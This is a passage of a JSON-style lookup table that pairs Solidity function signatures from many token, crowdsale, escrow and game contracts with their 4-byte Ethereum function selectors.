"incrementCountSales(uint256,uint256)": "0x8a955876", "getClassPlayers(uint256,uint256,uint256)": "0xa80e6c01", "getLengthClassPlayers(uint256,uint256)": "0x7a5c9028", "getBoxPrice(uint256,uint256)": "0xca17cad1", "HITSCoin()": "0x1a4be5d8", "transferToMultisig()": "0x10fc0d39", "setStartICO(uint256)": "0xb32cb292", "Wolf()": "0xab0cf8b7", "JessieEducationToken()": "0x03f744b0", "TokenBase(uint256,string,string)": "0xa083cb48", "PattyCoin(uint256,string,string)": "0x96862e2d", "ProofOfTrevonJames2()": "0x5b00763e", "Travelercoin()": "0x75a35191", "buyNow(uint256)": "0x08a0f32f", "createPreSaleShip(string,uint256,uint256)": "0x9925d68e", "CSCRarePreSaleManager()": "0xe7e766ca", "_buy(uint256,address,uint256)": "0x62c6beea", "_createSale(uint256,uint256,uint256,uint64,address)": "0xb01b3b6c", "_bid(uint256,address,uint256)": "0x33966cb6", "getShipDetails(uint256)": "0x18f96441", "_createCollectible(bytes32,address)": "0x250537fc", "PimmelToken()": "0x9c01fdaa", "GetDeadline()": "0xf98157bd", "GetInvestorAddress()": "0x61064b48", "TransferMyGGTokens()": "0x565eab8e", "ChainMaster()": "0x06ee4917", "OxToken(address)": "0x4ba71f3c", "FirstSaudiToken()": "0x1da16e8b", "distributeVSN(address[],uint256)": "0xd94acc0a", "VisperNetwork()": "0xadad1cb1", "mintbuy(address,uint256)": "0xcf295a5c", "buyOwn(address,uint256)": "0x24b4ec3d", "fromEthers(uint256)": "0xb8d400d2", "toEthers(uint256)": "0xed82cac9", "priceof()": "0x0894183d", "OG()": "0x17e9884d", "depositEtherToVault(uint256)": "0xbd79d692", "depositTokenToVault(address,uint256,uint256)": "0x7f4a9691", "getLockedValue(address)": "0x067a1e16", "expiredLockPeriod()": "0xe5a3c771", "getInvestmentRecordListLength()": "0xb7f37983", "getInvestmentRecord(uint256)": "0x0352017b", "addToPayeeBalance(address,address,uint256)": "0xe38180ec", "addPayee(address,address,uint256)": "0x32395c2b", "partialClaim(address,uint256)": "0xcef4be3c", "calculateMaximumPayment(address,address)": "0xde9ee13e", "executeClaim(address,address,uint256)": "0x037ed3e2", "computePayeeBalance(address,address,uint256)": "0x51f514d3", "commonWithdraw(address,uint256)": "0xda9d95bc", "commonDeposit(address,uint256)": "0x2bd928e4", "PPToken(uint256,string,string)": "0x0dcd9759", "disableTrading()": "0x17700f01", "changeControlWallet(address)": "0x5a8cf571", "enact_withdrawal_less(address,uint256,uint256)": "0x903b1f20", "enact_withdrawal_greater_equal(address,uint256,uint256)": "0x2c4ab666", "withdraw_to(address,uint256,uint256,uint256)": "0x3643d14b", "BMTToken()": "0x3628e6f3", "getManifestId(address,bytes32,bytes32)": "0x33d020ae", "getManifest(address,bytes32,bytes32)": "0x501957b8", "register(bytes32,bytes32,bytes32,string)": "0x7cb34d2d", "GerritCoin()": "0x8be9ca21", "perform_withdraw()": "0xf273fbbc", "GlobalConstraintRegistrar(int256)": "0x6c15e8e6", "addTokens(address,uint256)": "0x6039fbdb", "addUser(address)": "0x421b2d8b", "BettingToken()": "0x66c2d6a0", "OwnableWithRecovery(address[],uint8)": "0x459b2cd6", "mLoadAndReturn(address)": "0x55560fd5", "mLoadAndReturn(bool)": "0x936597da", "mLoadAndReturn(bytes32)": "0xc14f42fd", "mLoadAndReturn(uint256)": "0x312452b3", "setMockAddress(bytes4,address)": "0x6c33e7eb", "setMockBool(bytes4,bool)": "0x7c4d18bd", "setMockBytes32(bytes4,bytes32)": "0xd2f65fbc", "setMockUint256(int256,bytes4,uint256)": "0x97b73c5c", "execute(address,bytes)": "0x1cff79cd", "transferDao(address)": "0xf0bf611b", "setDeprecated(string,address)": "0xc39513af", "Upgradable(string)": "0x3b1b69f9", "testProvidedValues()": "0x28169ec1", "testDeployedValues()": "0x25cc348f", "returnArray()": "0x3cac14c8", "multiFixed(uint256[2][6])": "0xa30cc5f6", "multiDynamic(uint256[2][])": "0x3a69db94", "C(bool)": "0xb1699e2e", "geneticallyEngineer(string)": "0xe8edb2ff", "Sheep(string,string)": "0xb627ff04", "authorizePayment(string,address,uint256,uint256)": "0x8e637a33", "SafecontractsTREXCrowdfunding()": "0x41fd32cf", "withdrawForTrexdevshop()": "0xd8887efc", "testtxorigin()": "0x4d66a3ab", "testgas()": "0xc8e9fc8b", "testGasPrice()": "0xe9de432f", "testvalue()": "0x99244d1a", "testdata()": "0xb449c689", "testmsg()": "0xbe8f316a", "getHashsLength()": "0x749c190b", "getIp(string)": "0x1868291f", "CAAction(address)": "0x5880b7da", "setAmount2Claim(uint256)": "0x618b870f", "setClaimInterval(uint256)": "0xf2d57adf", "setRecipient(address)": "0x3bbed4a0", "setDonator(address)": "0x52e1ea89", "isInitalized()": "0x8cd70e72", "claimPocketMoney()": "0xc9ffb6e3", "PocketMoneyContract()": "0xe3685ef7", "proxyClaimTokens(address,address)": "0xd475bfa8", "removeFromWhitelist(address[])": "0x548db174", "addToWhitelist(address[])": "0x7f649783", "changeSettings(uint256,uint256,uint32)": "0xde605ecc", "DutchAuction(address,address,address,address,uint256,uint256,uint32)": "0x2c145eef", "collectDonations(uint256,address)": "0xae4b5cb8", "like(uint256)": "0xe82935da", "sendMessage(string)": "0x469c8110", "EtheriumWall(string)": "0x4f1157aa", "getRedeemedPeriods(bytes32,address,uint256)": "0xb7c251c3", "getPeriodsToPay(bytes32,address,uint256)": "0xe074ee55", "redeem(bytes32,address,bool[4])": "0xd58bf09a", "redeemExternalToken(bytes32,address)": "0xe63b681e", "redeemEther(bytes32,address)": "0xcd3ce306", "redeemNativeToken(bytes32,address)": "0xbb1c9351", "redeemReputation(bytes32,address)": "0x0d5e1e82", "ContributionReward()": "0xdb491d49", "RemapImportedNotUsed()": "0x858e58d6", "RemapImported()": "0x8a7cc2ca", "hash(bytes20,uint96,uint32,bytes32[],uint16)": "0xfdbf0765", "validate(bytes20,uint96,uint32,bytes32[],uint16)": "0xf16bdb9c", "register(bytes20,uint96,uint32,bytes32[],uint16)": "0xe6bf70e2", "enactProp(uint256)": "0x412eee05", "EthTraderDAO(address,bytes32,address,address,address)": "0x7acb3e67", "getCash(uint256,address)": "0x71ada3fb", "getPosition(uint256,uint256,address)": "0x28e70c4e", "getOption(uint256,uint256)": "0x1ce30927", "getNumOptions(uint256)": "0xedeb797c", "getNumOptionChains()": "0xd392c5a2", "getAvailableFunds(address)": "0xc803486b", "addToOptionChain(uint256,uint256[],uint256[],bytes32[],address[])": "0x0a2d31ad", "getMaxLoss(address)": "0x5dbbfc47", "cancelOrdersOnOption(uint256,uint256)": "0xd70fe207", "getOptionSellOrders(uint256,uint256)": "0x03406e76", "getOptionBuyOrders(uint256,uint256)": "0x711b4871", "setExpirationDate(address)": "0x802608a2", "setBirthDate(address)": "0xee6a5e54", "revokePermission(address)": "0xa3bf5b9a", "grantPermission(address)": "0x2d8e3278", "assign(address)": "0x85aba275", "createCopyright(string,address,uint256,uint256,string,string,string,uint256,uint256)": "0xeebc20d2", "returnError()": "0xdad03cb0", "bigLoop(uint256)": "0xe65f1d98", "arrayIndexOutOfBoundsDynamic(uint256)": "0x01cb63e8", "arrayIndexOutOfBounds(uint256)": "0x36548b58", "divideByZero(uint256)": "0xca1ab2ef", "Errors()": "0xf61d9afc", "test_oneAssert()": "0x5bb41203", "pause(bool)": "0x02329a29", "forward(address,uint256,uint256)": "0x411a3dcf", "distributeEther()": "0x494bf608", "registerMember(address,bytes,uint256)": "0x251e3d7d", "CypressOrganization(bytes,uint256)": "0xa44cff28", "changeOwnship(address)": "0x8e082555", "requestToken()": "0x4d7ec628", "OpusToken(address)": "0xd6b0f363", "QYKToken()": "0xe2d07a33", "GreenEcoMinerToken()": "0x8c1d4a0a", "Olife()": "0x46e184da", "VEGANToken()": "0x64a237f4", "depositInPot()": "0x120960de", "changeAccount(address)": "0xaa049691", "oraclizeQueryGas(uint256)": "0xff523cb2", "rangeOfBets(uint256,uint256)": "0xf8e2dc6a", "changeFreeBetValue(uint256)": "0xb72f8ebb", "changeOperative(address)": "0xe688aab4", "freeBet(address)": "0x7d7f1699", "paid(uint256,uint256,bytes32)": "0x546c2b93", "identify(string)": "0xb4c65de3", "addClient(bytes32)": "0xada44092", "auditor(uint256,bytes32)": "0xe6c88b31", "Jackypot()": "0x58f8e99e", "countTokens(uint256,address)": "0xd0c0c39c", "safePayback(address,uint256)": "0x8b021df4", "getCurrentStageDiscount()": "0xa7ec619f", "minCapFail()": "0x545d8b55", "icoEndUnfrozeTokens()": "0xae7635f2", "IAHCToken()": "0x48612fc0", "Hostblock()": "0xce17f01e", "CulturalCoinCrowdsale(uint256,uint256,uint32,uint32,address,address,address,uint256,uint256,uint256,uint256,uint256)": "0xd4cd5509", "cummulativeTokensSold()": "0xd0d89ce3", "hasIcoEnded()": "0x7b851f65", "executeTransaction(address,uint256,uint256)": "0xef22b87f", "getCurrentTokenAmountForOneBtc()": "0xe5d8011f", "getCurrentTokenAmountForOneEth()": "0xc00e4306", "getTokenAmount(uint256,uint8)": "0x44377ebb", "getIcoDiscountPercentage()": "0x56ddeea2", "setIcoDiscountPercentages(uint8,uint8,uint8,uint8)": "0xc3d59369", "setIcoPhase4(uint256,uint256)": "0xfec0cc19", "setIcoPhase3(uint256,uint256)": "0xcff12797", "setIcoPhase2(uint256,uint256)": "0x808c1499", "setIcoPhase1(uint256,uint256)": "0x455770a4", "setICOtime(uint256,uint256)": "0x30fee9b1", "setRates(uint32,uint32)": "0x91318874", "Crowdsale(uint256,uint256,uint32,uint32,address,address,address,uint256,uint256,uint256,uint256,uint256)": "0x8e89f6e2", "changeRateSetter(address)": "0x713be126", "RateSetter()": "0xe6c160dc", "FeneroToken()": "0x2e73dba0", "forwardEndTime(uint256)": "0x1f0c03f4", "releaseVault()": "0x63b1152a", "airdropTokens(address,address[],bool)": "0xdb12999b", "donate(uint8,bytes32,bytes32)": "0xde5eaa83", "removeBlacklistAddress(address,address)": "0x4e815698", "addBlacklistAddress(address,address)": "0xfa2d84b6", "ElepigCrowdsale(uint256,uint256,uint256,address,uint256,uint256,address,address,address)": "0x48481b8a", "isValidAccessMessage(address,uint8,bytes32,bytes32)": "0x32624114", "transferSigner(address)": "0x3660a084", "Delegation(address)": "0x600005b3", "Delegate(address)": "0x49339f0f", "EASTADScredits()": "0x09e6a0ed", "saleis(bool)": "0xbaf6f9ca", "TwoXJackpot()": "0xa9535320", "ARM()": "0x46875458", "salutaAndonio()": "0x5f766118", "EfectiveToken()": "0x4ae34bb1", "getHashSignatures(uint256)": "0x00d2c31d", "isHashSigned(uint256)": "0x2039b386", "signHash(uint256)": "0x70b3d68c", "transferHashOwnership(uint256,address)": "0x59d998e4", "createHash(uint256,address)": "0x769edf6a", "SherolexToken()": "0x643f9b72", "QKL()": "0x7c4e7fbb", "getSaddle(uint256)": "0xf8339005", "_generateNewSaddle(uint256,uint256,uint256,address)": "0x34409e38", "createSaddle6(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,address)": "0xe1a05344", "createSaddle1(uint256,uint256,uint256,address)": "0x19b61c09", "raceRegistration(uint256,address)": "0xcdee5c4a", "raceOut(uint256)": "0xb716f404", "SaddlePr(uint256)": "0x85bde3f2", "SaddleFS(uint256)": "0x02421ca7", "ownerOfID(uint256)": "0xcc80f9e8", "SaddleNotForSale(uint256)": "0x03906217", "SaddleForSale(uint256,uint256)": "0xaff9f40d", "_newSaddle(uint256,uint256,uint256,bool,address)": "0x6020d2c5", "setForDutchSale(uint256,uint256,uint256)": "0xf9c6046a", "newDutchPriceRate(uint256,uint256)": "0x109ef276", "getCurrentSaddlePrice(uint256)": "0x6d9c8e86", "transfer10(address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x9b973803", "setSaddleShopSaleFee(uint256)": "0xaf35ae3e", "firstSellSaddleShop(uint256,uint256,uint256)": "0x6c97c237", "buySaddleShop(uint256)": "0x60ef6037", "changeSaddleShopPrice(uint256,uint256)": "0x1d9f3cb5", "newPriceDecreaseRate(uint256,uint256)": "0xd3220144", "getCurrentItemPrice(uint256)": "0xdcf8f13a", "newRaceDistCon(address)": "0x728d3dd2", "newSaddleryCon(address)": "0x6e2f0bb8", "getEtherForStakes(uint256)": "0x49edfed9", "sellStake()": "0x6bfc9561", "buyStake()": "0x45488ac1", "withdrawDividends(address)": "0x48650338", "sellMyStake()": "0x9fa45fa6", "stakeOf(address)": "0x42623360", "TestingCoin()": "0xb36292eb", "addManyUsers(address[])": "0xed28ef51", "withdrawMana(uint256)": "0x6d805b2d", "activateHandbreak()": "0x069e9dba", "updateTax(uint256)": "0xcca0feb6", "canBurnSecurity(address,uint256)": "0x63f019f6", "canBurnUtility(address,uint256)": "0x0cc7086b", "canMintUtility(address,uint256)": "0xb8a358e9", "finalizeBurnUtility(address,uint256)": "0x544be427", "finalizeMintUtility(address,uint256)": "0xec737576", "createChannel(bytes32,uint256,uint256)": "0x9acae9fc", "RewardChannel(address,address,address)": "0x815d1fe5", "batchTransferORSS(address[],uint256[])": "0xbbdb57c3", "batchTransferORS(address[],uint256)": "0x25e1c6f7", "STSTEST3()": "0xa652477b", "loikikd()": "0x7981fd67", "getPatientHealthData(address)": "0x24c4e3b9", "updatePatientHealthData(string,string,uint256)": "0xa13d2733", "withdrawBatchTokenToInvestor()": "0x106ffbd3", "withdrawTokenToInvestorOwner(address)": "0xa615d7ee", "withdrawTokenToInvestor()": "0x3bc325ee", "getInvestorAddr(uint256)": "0x86b08228", "getSingleInvestor(address)": "0xce57d8d5", "calculateToken(uint256)": "0x1b3d36de", "transferTokenAndLock(address,uint256)": "0x63e2c349", "_getContractTokenBalance()": "0xd2879f47", "BitCronus1()": "0x3f9f7779", "EscrowContract(address,address,uint256,uint256)": "0xf60b0714", "EcomethToken()": "0x9a7baa81", "JerryToken()": "0x24e5355e", "isValidTokenId(uint256)": "0x2c1b38ee", "VicDemToken()": "0x4c19dd1c", "isClientBlocked(address)": "0x17e01c95", "unblockClient(address)": "0x21f0b382", "blockClient(address)": "0x40754714", "XEV()": "0xea8ab096", "createDate(uint256,uint256,uint256,uint256)": "0x364aa98d", "createTokenEscrow(address,uint256,address)": "0x5d29206b", "createEscrow(address,uint256)": "0x4614874e", "EscrowContract(address,address,uint256,address)": "0xedc7bcf5", "setMarketer(address)": "0x615a604f", "setPixelDistributor(address)": "0xecf82c91", "setContentsManager(address)": "0x8935b613", "setRoleManager(address)": "0xf1d588c5", "setUserPaybackPool(address)": "0x9bcf497b", "setReportRegistrationFee(uint256)": "0x4f7cd683", "setUserPaybackRate(uint256)": "0x300309f0", "setInitialDeposit(uint256)": "0x99649d06", "setDepositRate(uint256)": "0xbf35588b", "setCdRate(uint256)": "0x7bdb7a90", "updateWalletAddress(address)": "0xc93c266e", "updateKryptoroToken(address)": "0x84e77da2", "KTOCrowdsale()": "0xd6b1deac", "KryptoroToken()": "0xd1bc5c8e", "setAvailableSupply(uint256)": "0x1723934d", "setTokenAllocator(address)": "0x4cff5d75", "Bittwatt()": "0xdb0aa668", "executeCreator(uint256)": "0x5f2aeae9", "executeBeneficiary(uint256)": "0x096191dd", "EscrowContract(address,address,uint256)": "0x91324bea", "nouveauContrat(address,address[],uint256[])": "0x1cd23711", "retribution(uint256,address)": "0xc3f84c05", "nouvelleProduction(uint256)": "0x0715b09f", "from_Initialisation_to_cycleDeVie()": "0x8433d6f2", "MundoGamerToken(uint256,string,uint8,string)": "0x9c3b9aa3", "storeOwnership(address,address)": "0x329350ea", "storeOwner(address)": "0x41555acd", "store(bytes,uint256,uint256,address)": "0x5aa83129", "creatorOwnership(address,address)": "0x07776028", "creatorOwner(address)": "0xe17b3054", "creator(bytes)": "0xb0a66a84", "canUse(address,uint256)": "0x3f10dea6", "about(address,uint256)": "0x63b4f786", "itemVoteDn(address,uint256)": "0x8298c3b5", "itemVoteUp(address,uint256)": "0x3f6ec73a", "itemCanVote(address,uint256)": "0xc591b3ca", "itemInfo(address,uint256,bytes)": "0xc157d72c", "itemPrice(address,uint256,uint256)": "0x651bfd2d", "item(address,uint256,bool,bytes)": "0xd85e88db", "pack(bytes)": "0x62b0ae87", "itemInfo(address,address,uint256,bytes)": "0xe633cefe", "itemPrice(address,address,uint256,uint256)": "0xe9fad716", "item(address,address,uint256,bool,bytes)": "0xbe6c87ad", "packInfo(address,bytes)": "0x5012adca", "pack(address,bytes)": "0xbfe9e7f4", "ownerShip(address)": "0x9e38ac15", "item(uint256,uint256,bytes)": "0x37d76636", "info(bytes)": "0x370b8c90", "setBonusWallet(address)": "0x55c797ce", "setTakeRewardsPeriod(uint256)": "0xf5d72a28", "returnBet(uint32)": "0x55ff85c3", "returnBet()": "0x62e838ef", "getReward(uint32)": "0x2f0c2c7c", "acceptBet(uint32)": "0x4636e095", "createBet(uint32,uint256)": "0xf2baaa07", "doCalculateRoom(uint256,bytes32)": "0x33588dfa", "doCalculate(uint256,bytes32)": "0x20c2f40b", "__callback(bytes32)": "0xdab23f7c", "calculateRoom(uint256,uint256,uint256)": "0x1d731345", "isTripleNumber(uint256)": "0xc2fd0263", "addGameRecord(address,uint256,int256,uint256,uint256,address,uint256,uint256)": "0x977e09e6", "readEventFromDatabase(uint64)": "0xe6972dbb", "getEventResult(uint64)": "0x159f82fc", "editEventResult(string,uint64,uint8)": "0x0fc81bdc", "_setBuyTime(uint256,uint32)": "0x70e4b809", "getTotalDivis(uint256)": "0x7dc5cc64", "_increaseTotalDivis(uint256,uint256)": "0x75718e2c", "_increasePrice(uint256)": "0xedb9548c", "_setOwner(uint256,address)": "0x62059839", "_createNewBadge(address,uint256)": "0xdceacb93", "_initBadges(address,uint256,uint256,uint256)": "0xce7ba916", "calcDiviDistribution(uint256,uint256)": "0xc287fa72", "isLastBadgeEle(uint256,uint256)": "0xc4dd5acc", "isFirstBadgeEle(uint256)": "0x8a80dfb1", "isNotSelf(address,address)": "0x7a91e53d", "isAddress(address,address)": "0xc6fdee56", "addressNotSet(address,address)": "0x3286fb75", "refererAllowed(address,address,address)": "0x5b8b4f91", "isValidBuy(uint256,uint256)": "0xbcc4f0ed", "AquaPay(string,uint256,uint8,string)": "0xa8565523", "removeBurner(address)": "0x02846858", "authorizeBurner(address)": "0x34376ca0", "ApplyForCertification(string,string,string,uint256)": "0x84e4d57f", "MXMPDMToken()": "0x14069b12", "BuurmansToken()": "0x93798ff5", "AHCToken()": "0xb439be79", "WXGToken()": "0x16996713", "MCoinToken()": "0x387da66c", "MubsToken()": "0x3b6c35c3", "TRIAL()": "0xdb5c9442", "set(bytes32,string)": "0xb4800033", "ERC20YSLToken()": "0xf850b7f8", "verifyWithdrawSignatures(uint256,address,address,uint256,bytes,bytes)": "0x1764250a", "recoverAddressFromWithdrawMessage(uint256,address,uint256,bytes)": "0xac59eeeb", "recoverAddressFromCooperativeSettleSignature(uint256,address,uint256,address,uint256,bytes)": "0x1a7cecb2", "recoverAddressFromBalanceProofUpdateMessage(uint256,bytes32,uint256,bytes32,bytes,bytes)": "0x8a27a88b", "recoverAddressFromBalanceProof(uint256,bytes32,uint256,bytes32,bytes)": "0x7bd13f08", "storeUnlockData(uint256,address,address,uint256,bytes32)": "0x1b107f7b", "getUnlockIdentifier(uint256,address,address)": "0xfe49ba1c", "getChannelParticipantInfo(uint256,address,address)": "0xee4516d9", "getChannelInfo(uint256,address,address)": "0x838d6e05", "cooperativeSettle(uint256,address,address,uint256,address,address,uint256,bytes,bytes)": "0x7a824b1d", "unlock(uint256,address,address,bytes)": "0x03d9d253", "settleChannel(uint256,address,uint256,uint256,bytes32,address,uint256,uint256,bytes32)": "0x9cadb159", "updateNonClosingBalanceProof(uint256,address,address,bytes32,uint256,bytes32,bytes,bytes)": "0xfadc554b", "closeChannel(uint256,address,bytes32,uint256,bytes32,bytes)": "0xdb45479b", "setTotalWithdraw(uint256,address,uint256,address,bytes,bytes)": "0x522471fc", "setTotalDeposit(uint256,address,uint256,address)": "0x63ea0143", "getRatioList()": "0x03f3e275", "getShareList()": "0x3e58a465", "getAddressRatio(address)": "0x710b2d8c", "getAddressCount()": "0xcdbb02af", "updateAdminFee(uint256)": "0xcff1b6ef", "updateShare(address[],address,uint256[],uint256)": "0x23b715cb", "createGateway()": "0x09bb7162", "_isProduct(address)": "0x8fbb9b49", "newGateway()": "0xf2ed2148", "setGateGas(uint256)": "0x8bbe005d", "ABC()": "0x34354f93", "RussianCash()": "0xecffc18a", "SuperCoin()": "0xd3d9e741", "existedOnWhitelist(address)": "0x8ab905d4", "test(address,uint256)": "0xba14d606", "GACToken()": "0xbf190c8e", "SmigesToken()": "0xf7086dd1", "setB(uint8)": "0x16abdf7d", "setA(string)": "0xb958abd5", "IYAKIN()": "0xc7bdcde9", "KFHToken()": "0xc18b5279", "createTable()": "0xb2a4c897", "checkCourse(uint256)": "0x04053d21", "countStureq()": "0xdfb5a995", "applyForCertification(string,string,string,uint256,uint256,uint256,uint256,uint8,uint8,uint16)": "0x1c24f0bd", "countCourses()": "0xe36c2072", "addCourse(string,string,string,uint256,uint8,uint8,uint16,uint8,uint8)": "0xe2326909", "CheckValidDate(uint8,uint8,uint16)": "0x850895dc", "KiemTraNamNhuan(uint16)": "0xca561d4d", "Maya_Preferred()": "0xe0340a05", "YourCrowdSale()": "0x6645167d", "NimCoin()": "0x69de4e84", "updateCandidate(address,string,string)": "0x0ddf0c41", "addCandidate(address,string,string)": "0xe22a6231", "setEthPriceInDollar(uint256)": "0xcf3006a1", "CLPTestNetToken()": "0xd2f2d549", "SetFreeYOU(uint256)": "0xa36be43a", "SetupYOU(string,string,uint256,uint256,uint256,address,address,uint256)": "0x96ff7631", "Youdeum()": "0x8a40c4c4", "PeerWalletsERC20Token()": "0xc748b54b", "setDetails(string,uint256)": "0xe803b708", "details()": "0x565974d3", "airdropMinting(address[],uint256[],int256)": "0x8b121c9d", "getUser(uint32)": "0xdb6f1e74", "createUser(uint32,uint64)": "0x82ae2227", "UserInfoContract()": "0xdbab7f1b", "CSpacesToken()": "0x4b24f7aa", "creatUserPurchase(address,address)": "0x7aaf58d7", "SetIPR(string,string,address,string,string,uint256,address)": "0xdf4fc373", "checkStoredFile(address)": "0x5ce62aa4", "setFile(string,string,uint256,address)": "0x5873cbe6", "NenasChain()": "0x14fa0b45", "FusoraToken()": "0x5002b2b9", "hoursSinceTimestamp(uint256)": "0xd01f4c9f", "getUnitsPerPeriod()": "0x703a6beb", "getRatePerTimeUnits(uint256,uint256)": "0x51ffd9e7", "approveAndCall(uint256,bytes)": "0xd4eaa9fd", "setContractAddress(address,address)": "0x23626df7", "BitcoinCityCoin()": "0x2e16e82e", "CUNCoin()": "0x4647d0c6", "launchSale()": "0x7f7376e8", "SchmeckleTokenSale()": "0xdf0b1344", "ICOCREED()": "0x033b8675", "changeLuck(uint32)": "0x12c0d1ea", "getLuck()": "0x1b413d27", "Luck()": "0x722e9c6d", "Badge(uint256,string,uint8,string)": "0x7ae145cb", "MuskToken()": "0xcbc24224", "YuanTaiToken(uint256,string,uint8,string)": "0x3a92a590", "VaN(address)": "0x55ba13da", "CIzTezt(string)": "0x93ca5de7", "RT()": "0xfc04771a", "VerificationAccountOnJullar()": "0x8764edd0", "RA(address)": "0x1ca84592", "CoinHot()": "0xca2145a7", "updateReleaseAmount(uint256)": "0x35dffde5", "checkIsReleaseRecordExist(uint256)": "0x5f51028d", "release(uint256,uint256)": "0x366a4120", "Releaseable(address,uint256)": "0x12a63964", "systemFreeze(uint256,uint256)": "0x780004ac", "Frozenable(address)": "0x54e7aed8", "AIT_TokenERC20(uint256,string,string)": "0xa67cace9", "Vicky()": "0xf11cfc56", "burnAfterIco()": "0x021bb947", "sellForOtherCoins(address,address,uint256)": "0x99d897f8", "UnicornCrowdsale(address,address,address,address)": "0x28ec4173", "Constrctor()": "0x39b0bde9", "MDICOStage1(address,address,uint256,uint256,uint256,uint256)": "0x1e5a652b", "tune(uint256,uint256,uint256,uint256,uint256)": "0xe18b170e", "whitelisted(address,address)": "0xbc120fe7", "blacklist(address,address)": "0xad28ff88", "icoInvestment(address,uint256)": "0x7277236b", "isValidICOInvestment(address,uint256)": "0x8091fc76", "changeICO(address)": "0x6d47fb71", "BaseICOToken(uint256)": "0x33b416db", "SouthAfricanRandsToken()": "0xe4aa2436", "acceptTrusteeOwnership()": "0x6f68d634", "transferTrusteeOwnership(address)": "0x3381ffe0", "acceptSmartTokenOwnership()": "0x79aca4e0", "transferSmartTokenOwnership(address)": "0x79fb18ac", "distributePartnerTokens()": "0x7e8c3ab6", "StoxSmartTokenSale(address,address,uint256)": "0xb93983dd", "grant(address,uint256,uint256,uint256,uint256,bool)": "0x5ee7e96d", "StoxSmartToken()": "0xf971b054", "MANHATTANPROXY7THST()": "0x75c8a66e", "ProxyCreationAndExecute(address)": "0x988bfd47", "WinkelERC20()": "0xe58b0eb1", "finishCrowdSale()": "0xd67c1a7a", "refundPart(address)": "0xf5c9d5f1", "refundAll(address)": "0x9b632829", "updateReservedWei()": "0x12f2b838", "getRealValueToReturn(uint256)": "0xe64acfa4", "getBonusPercent()": "0x38cb252f", "rICO(address,address,address)": "0xea31ccb6", "partial_refund()": "0x689f2456", "withdraw_bonus()": "0x0107a8df", "set_allow_refunds(bool)": "0xebc56eec", "set_bonus_received(bool)": "0x346f2eb7", "force_partial_refund(address)": "0x7036f9d9", "force_refund(address)": "0x18af7021", "Moongang(uint256,uint256,uint256)": "0x6fa87f66", "withdrawETH(uint256)": "0xf14210a6", "getExpectedRate(uint256)": "0x0967417b", "retrieveTokenByContract(address,uint256)": "0xc7bc747d", "retrieveToken(uint256)": "0x5542f680", "retrieveEther(uint256)": "0xb0d13a25", "CoolTourToken()": "0x58e66522", "lockAddress(address,address,uint256)": "0x6fe4c195", "MikadoToken()": "0xa7e48375", "contentURI(uint256)": "0x6e667c35", "setContentURI(uint256,string)": "0x4def0453", "getBoundingBox(uint256)": "0x7fef21d4", "mint(address,uint256,int16,int16,int16,int16,int16,int16,uint256)": "0xcd076620", "takeOwnership()": "0x60536172", "TRHToken(address,string,string,uint256,uint256)": "0xe5f9a40f", "GayPersonalAds()": "0xb9359169", "GayPersonalAdsToken(uint256,string,uint8,string)": "0x9b110f4b", "callEmitter(uint256)": "0x3aec5458", "setEmitter(address)": "0x9f903ff6", "TeleGrams()": "0xbeca4a8e", "DogRacingToken()": "0xfc52f2eb", "getSurveyInfo(bytes32)": "0x051b4e6c", "removeSurvey(bytes32)": "0x3118879a", "giveReward(bytes32,address,uint8)": "0xe01ac5a4", "placeNewSurvey(bytes32,uint256,uint32,uint256)": "0xf356e8de", "removeRobot(address)": "0x55ad798f", "addRobot(address)": "0x59b563b5", "setFeeReceiver(address)": "0xefdcd974", "SurveyToken(uint256)": "0x3d1cefc4", "isQualitifiedAddress(address)": "0x9157e556", "drop(address,address[],uint256[])": "0x7da5efc8", "CTWorld()": "0x54203101", "FondoNetwork(uint256,string,string)": "0xcdefa007", "transferSub(address,uint256)": "0x9b5b969f", "addCrowdSale(uint256)": "0xd47d996e", "totalCrowdSale()": "0x4c5d6d93", "nextGameCost()": "0xedb2b809", "minimumDurationInBlocks()": "0xcb6d0c5f", "VitToken()": "0x585ce259", "ICO_PRICE7()": "0xae53d79e", "DST_BOUNTY()": "0xfe7f0d14", "firstTarget()": "0xf5db9820", "openRaceCount()": "0x606dc104", "totalFails()": "0x5db39a1e", "numOfReleased()": "0x34f25146", "secondRoundICOEnd()": "0x403b7d9b", "committeesArrayIndexCounter()": "0x1a4fbee1", "debug_wei()": "0xdc3ecbb4", "_BLOCKS_PER_READJUSTMENT()": "0xb5ade81b", "goldCertVerifier()": "0xa8e6ee52", "getNumGamesStarted()": "0x1123efd5", "contractRefundFinished()": "0xcbfa18ea", "BountyManagerEntity()": "0x19ee5bca", "lastAllowancePaymentTimestamp()": "0x5f238402", "MINfinney()": "0xfdee579c", "ownerRandomHash()": "0x2e93497e", "donacionTeleton()": "0xff668cbe", "nextParticipantIndex()": "0xd20de0bc", "realityID()": "0x9ab90ba0", "softCapTime()": "0x14cf12d5", "minEligibility()": "0x495c9588", "TOKEN_RATE_BASE_RATE()": "0xb28c461c", "sclToken()": "0x69919447", "mainsaleTotalNumberTokenSold()": "0x92bd3f16", "hardCapPreIco()": "0x5fcc9d0f", "mainCapInUSD()": "0x13ae457d", "Stage3Allocation()": "0xd768dd4b", "stage3_start()": "0xe17a7c70", "communityPot_()": "0xbfdf5e80", "winOdd()": "0x174f51eb", "contractHolderAddress()": "0xe1bd5af9", "supplyController()": "0xe7ba1012", "tokensDaily()": "0x8b39bdba", "feesController()": "0xe8f62764", "FoundationAddressFreezeTime()": "0xfc58edea", "prizeAmount()": "0x785fa627", "iDistribution()": "0x87a88c43", "organizer7()": "0x6267c456", "totalSite()": "0x89b97d07", "etherPrice()": "0x9e307955", "startAt()": "0xc7446565", "addressFutureInvest()": "0xbf260037", "checkPayment()": "0x79a8416e", "ICO_START_TIME()": "0x1b4cd2de", "mintAmount3()": "0x517a70d4", "isUpgradable()": "0x5479d940", "avatarTransferState()": "0xe34ac873", "ATTR_LEASABLE()": "0x78f13614", "pixelCost()": "0xa20f4ee6", "batlordReq()": "0x27da5ca5", "payBankRoll()": "0xeffe031e", "develop()": "0x8c0cf897", "continuousSale()": "0x85bb8e29", "firstWeek()": "0x7ad77fd9", "totalNtsSoldWithBonus()": "0x4a31259f", "shareholder()": "0x0939e863", "lastBlock_v1Hash_uint256()": "0xccceee48", "getTotalRuns()": "0xe05f149e", "registration_fee()": "0x5792e262", "vestingVault()": "0xa5917baf", "preCrowd_tokens_scaled()": "0x99522297", "buyFactor()": "0xc07dd842", "numFunders()": "0xb9632689", "deathData_a11()": "0xc83a9472", 